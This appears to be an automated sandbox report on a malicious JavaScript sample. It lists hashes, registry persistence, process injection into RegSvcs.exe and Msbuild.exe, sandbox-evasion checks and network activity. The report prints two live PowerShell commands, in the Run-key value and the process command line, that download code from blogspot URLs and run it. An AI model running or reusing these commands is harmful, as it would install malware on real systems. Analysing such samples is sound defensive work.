Analysis
- max time kernel: 134s
- max time network: 115s
- platform: windows10-2004_x64
- resource: win10v2004-20240419-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20240419-en locale:en-us os:windows10-2004-x64 system
- submitted: 07-05-2024 17:42
Static task: static1
Behavioral task: behavioral1
Sample: b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js
Resource: win7-20240419-en
Behavioral task: behavioral2
Sample: b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js
Resource: win10v2004-20240419-en
General
- Target: b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js
- Size: 1.8MB
- MD5: fffee7bcbf8f724b68d02ebe0c5a133b
- SHA1: 739696c36214a1a37f382b4da835ba44d2665027
- SHA256: b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8
- SHA512: 3f2bd2aa6b5cb22aa0c2042fa3af032c83b55f7e5407344cdb502abaf33b3e42d2e0073540226e6a8f3e09f3495ddbc339bfa29a38e420f11583632aa55fe8f4
- SSDEEP: 768:cNWDuYelMVBbnPOgADSb8O/b64/jWsYOS+Hu8N0RNta7SuHiHwdcU6AH6xgO:JewBbnPOgnh/6OSAuNA6H9AH83
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exe
flow | pid | process
7 | 2664 | powershell.exe
8 | 2664 | powershell.exe
20 | 2664 | powershell.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation | wscript.exe
-
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource | yara_rule
behavioral2/memory/224-28-0x0000000000D10000-0x0000000000D96000-memory.dmp | agile_net
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bookignr2 = "mshta \"javascript:tg=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm htlmay5-24.blogspot.com/hehe | iex);Start-Sleep -Seconds 5;','run']; hl=[tg[3],tg[0],tg[1],tg[2]]; new ActiveXObject(hl[2])[hl[0]](hl[3], 0, true);close();new ActiveXObject(hl[1]).DeleteFile(WScript.ScriptFullName);\"\n" | powershell.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bookignr1 = "schtasks /run /tn Bookignr1" | powershell.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
38 | api.ipify.org
39 | api.ipify.org
40 | ip-api.com
-
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exe
description | pid | process | target process
PID 2664 set thread context of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 set thread context of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 set thread context of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 set thread context of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 set thread context of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 set thread context of 4424 | 2664 | powershell.exe | Msbuild.exe
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exe dw20.exe dw20.exe dw20.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dw20.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dw20.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dw20.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dw20.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dw20.exe
-
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
dw20.exe dw20.exe dw20.exe dw20.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dw20.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dw20.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dw20.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dw20.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dw20.exe
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
powershell.exe RegSvcs.exe
pid | process
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2716 | RegSvcs.exe
2716 | RegSvcs.exe
2716 | RegSvcs.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
2664 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe dw20.exe RegSvcs.exe dw20.exe RegSvcs.exe dw20.exe dw20.exe
description | pid | process
Token: SeDebugPrivilege | 2664 | powershell.exe
Token: SeRestorePrivilege | 2536 | dw20.exe
Token: SeBackupPrivilege | 2536 | dw20.exe
Token: SeDebugPrivilege | 224 | RegSvcs.exe
Token: SeBackupPrivilege | 1304 | dw20.exe
Token: SeDebugPrivilege | 2716 | RegSvcs.exe
Token: SeBackupPrivilege | 4644 | dw20.exe
Token: SeBackupPrivilege | 1304 | dw20.exe
Token: SeBackupPrivilege | 4644 | dw20.exe
Token: SeBackupPrivilege | 1304 | dw20.exe
Token: SeBackupPrivilege | 4644 | dw20.exe
Token: SeBackupPrivilege | 1304 | dw20.exe
Token: SeBackupPrivilege | 4644 | dw20.exe
Token: SeBackupPrivilege | 1304 | dw20.exe
Token: SeBackupPrivilege | 4644 | dw20.exe
Token: SeBackupPrivilege | 1304 | dw20.exe
Token: SeBackupPrivilege | 4644 | dw20.exe
Token: SeBackupPrivilege | 1304 | dw20.exe
Token: SeBackupPrivilege | 4644 | dw20.exe
Token: SeBackupPrivilege | 1304 | dw20.exe
Token: SeBackupPrivilege | 4644 | dw20.exe
Token: SeBackupPrivilege | 3496 | dw20.exe
Token: SeBackupPrivilege | 2536 | dw20.exe
Token: SeBackupPrivilege | 2536 | dw20.exe
Token: SeBackupPrivilege | 3496 | dw20.exe
Token: SeBackupPrivilege | 3496 | dw20.exe
Token: SeIncreaseQuotaPrivilege | 2664 | powershell.exe
Token: SeSecurityPrivilege | 2664 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2664 | powershell.exe
Token: SeLoadDriverPrivilege | 2664 | powershell.exe
Token: SeSystemProfilePrivilege | 2664 | powershell.exe
Token: SeSystemtimePrivilege | 2664 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2664 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2664 | powershell.exe
Token: SeCreatePagefilePrivilege | 2664 | powershell.exe
Token: SeBackupPrivilege | 2664 | powershell.exe
Token: SeRestorePrivilege | 2664 | powershell.exe
Token: SeShutdownPrivilege | 2664 | powershell.exe
Token: SeDebugPrivilege | 2664 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2664 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2664 | powershell.exe
Token: SeUndockPrivilege | 2664 | powershell.exe
Token: SeManageVolumePrivilege | 2664 | powershell.exe
Token: 33 | 2664 | powershell.exe
Token: 34 | 2664 | powershell.exe
Token: 35 | 2664 | powershell.exe
Token: 36 | 2664 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2664 | powershell.exe
Token: SeSecurityPrivilege | 2664 | powershell.exe
Token: SeTakeOwnershipPrivilege | 2664 | powershell.exe
Token: SeLoadDriverPrivilege | 2664 | powershell.exe
Token: SeSystemProfilePrivilege | 2664 | powershell.exe
Token: SeSystemtimePrivilege | 2664 | powershell.exe
Token: SeProfSingleProcessPrivilege | 2664 | powershell.exe
Token: SeIncBasePriorityPrivilege | 2664 | powershell.exe
Token: SeCreatePagefilePrivilege | 2664 | powershell.exe
Token: SeBackupPrivilege | 2664 | powershell.exe
Token: SeRestorePrivilege | 2664 | powershell.exe
Token: SeShutdownPrivilege | 2664 | powershell.exe
Token: SeDebugPrivilege | 2664 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 2664 | powershell.exe
Token: SeRemoteShutdownPrivilege | 2664 | powershell.exe
Token: SeUndockPrivilege | 2664 | powershell.exe
Token: SeManageVolumePrivilege | 2664 | powershell.exe
-
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
wscript.exe powershell.exe Msbuild.exe RegSvcs.exe Msbuild.exe RegSvcs.exe
description | pid | process | target process
PID 4044 wrote to memory of 2664 | 4044 | wscript.exe | powershell.exe
PID 4044 wrote to memory of 2664 | 4044 | wscript.exe | powershell.exe
PID 2664 wrote to memory of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 2716 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 224 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4800 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4440 | 2664 | powershell.exe | RegSvcs.exe
PID 2664 wrote to memory of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4672 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4424 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4424 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4424 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4424 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4424 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4424 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4424 | 2664 | powershell.exe | Msbuild.exe
PID 2664 wrote to memory of 4424 | 2664 | powershell.exe | Msbuild.exe
PID 4672 wrote to memory of 1304 | 4672 | Msbuild.exe | dw20.exe
PID 4672 wrote to memory of 1304 | 4672 | Msbuild.exe | dw20.exe
PID 4672 wrote to memory of 1304 | 4672 | Msbuild.exe | dw20.exe
PID 4800 wrote to memory of 2536 | 4800 | RegSvcs.exe | dw20.exe
PID 4800 wrote to memory of 2536 | 4800 | RegSvcs.exe | dw20.exe
PID 4800 wrote to memory of 2536 | 4800 | RegSvcs.exe | dw20.exe
PID 4424 wrote to memory of 4644 | 4424 | Msbuild.exe | dw20.exe
PID 4424 wrote to memory of 4644 | 4424 | Msbuild.exe | dw20.exe
PID 4424 wrote to memory of 4644 | 4424 | Msbuild.exe | dw20.exe
PID 4440 wrote to memory of 3496 | 4440 | RegSvcs.exe | dw20.exe
PID 4440 wrote to memory of 3496 | 4440 | RegSvcs.exe | dw20.exe
PID 4440 wrote to memory of 3496 | 4440 | RegSvcs.exe | dw20.exe
Processes
-
C:\Windows\system32\wscript.exe (depth 1)
Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8.js
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (depth 3)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (depth 3)
Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe (depth 3)
Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe (depth 4)
Command line: dw20.exe -x -s 772
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe (depth 3)
Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe (depth 4)
Command line: dw20.exe -x -s 784
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe (depth 3)
Command line: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe (depth 4)
Command line: dw20.exe -x -s 648
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe (depth 3)
Command line: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe (depth 4)
Command line: dw20.exe -x -s 780
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads